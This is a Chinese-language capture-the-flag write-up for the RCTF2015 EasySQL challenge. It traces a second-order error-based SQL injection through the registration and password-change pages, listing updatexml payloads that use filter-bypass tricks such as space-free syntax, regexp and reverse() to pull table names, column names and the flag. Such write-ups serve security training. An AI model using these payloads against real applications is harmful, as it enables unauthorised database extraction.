[RCTF2015]EasySQL

直接登录没有反应
然后注册的时候直接随便注册一个账号，登录之后没发现有啥提示除了url有个title
然后发现可以修改密码

但是还是没有我们想要的hint，重新开靶机注册账号admin'，还是没有用，继续刷靶机，注册admin"

修改密码出现了报错，报错注入开始
我尝试在改密码界面注入，但是没有任何回显
仔细想想与我们之前做的不同的应该是注册页面

admin' ->admin" ->报错注入语句,用引号闭合，那么我们是不是可以得到信息

成功

-1"||updatexml(1,concat(0x7e,database(),0x7e),3)#

-1"||updatexml(1,concat(0x7e,(select(group_concat(schema_name))from(information_schema.schemata)(limit)4,1),0x7e),3)#
这个应该是没有写错的，但是不能成功     
很多查行数的都被过滤了mid limit right left
那估计就是不让查库名，我们直接爆表吧
-1"||updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),3)#

-1"||updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),0x7e),3)#
这个列名是我猜的后面知道原来可以这样绕过
real_flag_1s_here

-1"||updatexml(1,concat(1,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),1),3)#

查flag的时候发现有很多其他的数据那么这里就需要使用到一个查找

-1"||updatexml(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')),1),3)#
flag{c7dc7860-822f-4d21-b505-c5

-1"||updatexml(1,concat(1,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1),3)#
}dcf50d62655c-505b-12d4-f228-068

def reverse_string(input_string):
    reversed_string = input_string[::-1]
    return reversed_string

# 测试字符串
input_str = "}dcf50d62655c-505b-12d4-f228-068"

# 调用函数并输出结果
reversed_str = reverse_string(input_str)
print(reversed_str)

flag{c7dc7860-822f-4d21-b505-c55626d05fcd}